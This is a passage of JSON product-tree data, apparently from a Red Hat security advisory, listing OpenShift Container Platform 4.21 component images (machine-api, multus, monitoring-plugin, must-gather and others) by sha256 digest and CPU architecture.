},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eb3b40f400c13c67de4aa77a3dcde6fa23a03b6ef172c6a3ac8762cee620608b_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eb3b40f400c13c67de4aa77a3dcde6fa23a03b6ef172c6a3ac8762cee620608b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eb3b40f400c13c67de4aa77a3dcde6fa23a03b6ef172c6a3ac8762cee620608b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:73e70d522fb58b91a88bf3b47211295ee9f800394c5367772dec9a3bbdc0c513_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:73e70d522fb58b91a88bf3b47211295ee9f800394c5367772dec9a3bbdc0c513_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:73e70d522fb58b91a88bf3b47211295ee9f800394c5367772dec9a3bbdc0c513_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a44c7d7358f6e6323c1898ea14923840a93d99447233c7f10fa1d3975b096bbd_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a44c7d7358f6e6323c1898ea14923840a93d99447233c7f10fa1d3975b096bbd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a44c7d7358f6e6323c1898ea14923840a93d99447233c7f10fa1d3975b096bbd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a98950f3880fe0bd22db370def7b4e5cc596efcc1e50e82ff983d59deebcbc87_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a98950f3880fe0bd22db370def7b4e5cc596efcc1e50e82ff983d59deebcbc87_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a98950f3880fe0bd22db370def7b4e5cc596efcc1e50e82ff983d59deebcbc87_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:cd112562715fcf7a10c911b471d3e5667fb8b2aa3a4d7d2d42edf99008ab01ea_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:cd112562715fcf7a10c911b471d3e5667fb8b2aa3a4d7d2d42edf99008ab01ea_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:cd112562715fcf7a10c911b471d3e5667fb8b2aa3a4d7d2d42edf99008ab01ea_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:0c9bb9ad12077b33f55b6696106afb58e0750f983c4f15edf0366244dbf4c58c_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:0c9bb9ad12077b33f55b6696106afb58e0750f983c4f15edf0366244dbf4c58c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:0c9bb9ad12077b33f55b6696106afb58e0750f983c4f15edf0366244dbf4c58c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:3795c200441089d373eaf98d9c1d3e1f4769c46bf0d8b8ac71e2f9eb2e5e3006_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:3795c200441089d373eaf98d9c1d3e1f4769c46bf0d8b8ac71e2f9eb2e5e3006_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:3795c200441089d373eaf98d9c1d3e1f4769c46bf0d8b8ac71e2f9eb2e5e3006_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:97b0fa634ba8534de5bb4c01447aa1c530be3a669fdae7657fefb6b4f981092f_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:97b0fa634ba8534de5bb4c01447aa1c530be3a669fdae7657fefb6b4f981092f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:97b0fa634ba8534de5bb4c01447aa1c530be3a669fdae7657fefb6b4f981092f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dfaa865808eee13a1df4f8e40201a3fadd6dd2e88b0d89880a2f5b81e635a820_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dfaa865808eee13a1df4f8e40201a3fadd6dd2e88b0d89880a2f5b81e635a820_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dfaa865808eee13a1df4f8e40201a3fadd6dd2e88b0d89880a2f5b81e635a820_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:0932593cd3bb6cd2e2b9ecad5e3bbe2fdcd107785ab3f8b25596f4901d8ae33a_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:0932593cd3bb6cd2e2b9ecad5e3bbe2fdcd107785ab3f8b25596f4901d8ae33a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:0932593cd3bb6cd2e2b9ecad5e3bbe2fdcd107785ab3f8b25596f4901d8ae33a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:33db1ea4989248c3760120da28f516110c25bec461090bed2b200505b3357470_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:33db1ea4989248c3760120da28f516110c25bec461090bed2b200505b3357470_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:33db1ea4989248c3760120da28f516110c25bec461090bed2b200505b3357470_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:57adf23fcec07626794be373afc7d776b9e384c23cfb53592cc1913b2b9bed00_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:57adf23fcec07626794be373afc7d776b9e384c23cfb53592cc1913b2b9bed00_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:57adf23fcec07626794be373afc7d776b9e384c23cfb53592cc1913b2b9bed00_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:7070ef2a6495712f2aa282baf40d7beabd5904b3256993681d573d83e172cbb6_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:7070ef2a6495712f2aa282baf40d7beabd5904b3256993681d573d83e172cbb6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:7070ef2a6495712f2aa282baf40d7beabd5904b3256993681d573d83e172cbb6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:9848868d7c2cdaecfe67a0acf26fef5ac0497a9767698a185610e52918c9a9d3_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:9848868d7c2cdaecfe67a0acf26fef5ac0497a9767698a185610e52918c9a9d3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:9848868d7c2cdaecfe67a0acf26fef5ac0497a9767698a185610e52918c9a9d3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:a3ee3f96cdebcae610e6b96a57cb03c127a4517a7db3db434243ab6e3238b78b_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:a3ee3f96cdebcae610e6b96a57cb03c127a4517a7db3db434243ab6e3238b78b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:a3ee3f96cdebcae610e6b96a57cb03c127a4517a7db3db434243ab6e3238b78b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb61e8a96ed0bd890b7e2ee52bffd6402ccca92e056fb43bb4c577f83eff2a1d_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb61e8a96ed0bd890b7e2ee52bffd6402ccca92e056fb43bb4c577f83eff2a1d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb61e8a96ed0bd890b7e2ee52bffd6402ccca92e056fb43bb4c577f83eff2a1d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb7894f06fee976d9c964bfec6eb72ed16fa9309de40508610fb2e031cd86035_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb7894f06fee976d9c964bfec6eb72ed16fa9309de40508610fb2e031cd86035_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb7894f06fee976d9c964bfec6eb72ed16fa9309de40508610fb2e031cd86035_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:43b10a72c5d7f3e182414dc3edebe2ebeeb2a4af0c4349a65e49e5bb1a789ba2_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:43b10a72c5d7f3e182414dc3edebe2ebeeb2a4af0c4349a65e49e5bb1a789ba2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:43b10a72c5d7f3e182414dc3edebe2ebeeb2a4af0c4349a65e49e5bb1a789ba2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a0eb4b703137f0acc68e4aa57032dc2b49d5ffd61f88fb0439e40bc1e0c1ef85_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a0eb4b703137f0acc68e4aa57032dc2b49d5ffd61f88fb0439e40bc1e0c1ef85_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a0eb4b703137f0acc68e4aa57032dc2b49d5ffd61f88fb0439e40bc1e0c1ef85_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:d2d0365a92e1bf0b4875cdfee71046eabf1086f0a4abfb76766742da0867b643_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:d2d0365a92e1bf0b4875cdfee71046eabf1086f0a4abfb76766742da0867b643_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:d2d0365a92e1bf0b4875cdfee71046eabf1086f0a4abfb76766742da0867b643_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:f77c2640a03260c85cdbaac6d50ad464c726bca3f744e3967989d194f46d1892_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:f77c2640a03260c85cdbaac6d50ad464c726bca3f744e3967989d194f46d1892_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:f77c2640a03260c85cdbaac6d50ad464c726bca3f744e3967989d194f46d1892_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:5fd3dcbd54108018a438b849eb89f35b4c34343cb5319fbfb30cf252e2a58a8f_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:5fd3dcbd54108018a438b849eb89f35b4c34343cb5319fbfb30cf252e2a58a8f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:5fd3dcbd54108018a438b849eb89f35b4c34343cb5319fbfb30cf252e2a58a8f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b3c5ce783d27d939251680683bdce181cb07a1163f34b4296a6f5612cd2c94a1_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b3c5ce783d27d939251680683bdce181cb07a1163f34b4296a6f5612cd2c94a1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b3c5ce783d27d939251680683bdce181cb07a1163f34b4296a6f5612cd2c94a1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7fe49c50219736630f128889b00b583d41a09297ac6888e2cf5d4f8b3f6aa54_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7fe49c50219736630f128889b00b583d41a09297ac6888e2cf5d4f8b3f6aa54_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7fe49c50219736630f128889b00b583d41a09297ac6888e2cf5d4f8b3f6aa54_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b87756166b86bc4b21e67c761d6fd90c0117b0cf740874b0c4df3531a4c7a1d2_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b87756166b86bc4b21e67c761d6fd90c0117b0cf740874b0c4df3531a4c7a1d2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b87756166b86bc4b21e67c761d6fd90c0117b0cf740874b0c4df3531a4c7a1d2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:0c0229e3ec73dd145493230412174b1454f0dd723bf9ae25286ef32f1042060e_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:0c0229e3ec73dd145493230412174b1454f0dd723bf9ae25286ef32f1042060e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:0c0229e3ec73dd145493230412174b1454f0dd723bf9ae25286ef32f1042060e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:15e5091704189fa9c3e99b69ca9755ede680de717143e7458179826b7211bba7_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:15e5091704189fa9c3e99b69ca9755ede680de717143e7458179826b7211bba7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:15e5091704189fa9c3e99b69ca9755ede680de717143e7458179826b7211bba7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eca257588b7ff0021eb3b25fad905cb90dd57b64fa26d1f0d0f2e5b75ba09996_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eca257588b7ff0021eb3b25fad905cb90dd57b64fa26d1f0d0f2e5b75ba09996_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eca257588b7ff0021eb3b25fad905cb90dd57b64fa26d1f0d0f2e5b75ba09996_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:f34b8488fa14562e7f1849599f0121aa8191f408bb0ea1b3151df11c7c3091ce_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:f34b8488fa14562e7f1849599f0121aa8191f408bb0ea1b3151df11c7c3091ce_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:f34b8488fa14562e7f1849599f0121aa8191f408bb0ea1b3151df11c7c3091ce_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:14210744d7b829c6c23f871ba63f68dd81c9b73766f5661e1d2d32213c4803f1_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:14210744d7b829c6c23f871ba63f68dd81c9b73766f5661e1d2d32213c4803f1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:14210744d7b829c6c23f871ba63f68dd81c9b73766f5661e1d2d32213c4803f1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:b65bfa071caa14408e3d4f2a3485e2f5d8edcdebeb24280000fb4efaa162a731_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:b65bfa071caa14408e3d4f2a3485e2f5d8edcdebeb24280000fb4efaa162a731_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:b65bfa071caa14408e3d4f2a3485e2f5d8edcdebeb24280000fb4efaa162a731_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:c3da1b1a1dc130b1757de265fc527a5b9b017b4b216d6f917607bf18699fb951_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:c3da1b1a1dc130b1757de265fc527a5b9b017b4b216d6f917607bf18699fb951_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:c3da1b1a1dc130b1757de265fc527a5b9b017b4b216d6f917607bf18699fb951_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:ea60b96bc780faa5904ab8ccffc93154ea5a015c6b367e0c265032d867d362cd_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:ea60b96bc780faa5904ab8ccffc93154ea5a015c6b367e0c265032d867d362cd_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:ea60b96bc780faa5904ab8ccffc93154ea5a015c6b367e0c265032d867d362cd_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:11960904264550e682164523f55396703b1cbbaa96dd7036e03e6be797d18937_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:11960904264550e682164523f55396703b1cbbaa96dd7036e03e6be797d18937_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:11960904264550e682164523f55396703b1cbbaa96dd7036e03e6be797d18937_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b6a81dba2bf98fabbc34dd4d9f2085a103a1234d52154e38baa3b80d6539d3d_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b6a81dba2bf98fabbc34dd4d9f2085a103a1234d52154e38baa3b80d6539d3d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b6a81dba2bf98fabbc34dd4d9f2085a103a1234d52154e38baa3b80d6539d3d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5e61f9895dd3c359917209aaa56cb9a1fba5e7b7946348f44ff1301045f0d1f0_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5e61f9895dd3c359917209aaa56cb9a1fba5e7b7946348f44ff1301045f0d1f0_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5e61f9895dd3c359917209aaa56cb9a1fba5e7b7946348f44ff1301045f0d1f0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:afe0287c049d7aeaf14cf70f515637e31ddc553c8c2dc285f05fb6fcadd45a3b_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:afe0287c049d7aeaf14cf70f515637e31ddc553c8c2dc285f05fb6fcadd45a3b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:afe0287c049d7aeaf14cf70f515637e31ddc553c8c2dc285f05fb6fcadd45a3b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:21d7e4128260488050af9719a2d28f408615f44a49265503b797f35215f76ca7_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:21d7e4128260488050af9719a2d28f408615f44a49265503b797f35215f76ca7_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:21d7e4128260488050af9719a2d28f408615f44a49265503b797f35215f76ca7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:4f496dc6fd91b97c5793449bd16640846cf3fd7d517193b660d796116b5f42e2_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:4f496dc6fd91b97c5793449bd16640846cf3fd7d517193b660d796116b5f42e2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:4f496dc6fd91b97c5793449bd16640846cf3fd7d517193b660d796116b5f42e2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:703bf81093cc684e4e3b5f50b95411654437361ffe9b6eb54a7e1ab2e4bd86b6_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:703bf81093cc684e4e3b5f50b95411654437361ffe9b6eb54a7e1ab2e4bd86b6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:703bf81093cc684e4e3b5f50b95411654437361ffe9b6eb54a7e1ab2e4bd86b6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:939f3334417609fa2a140629d6bc3ab13cc99128da92b32c5b437820422875b0_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
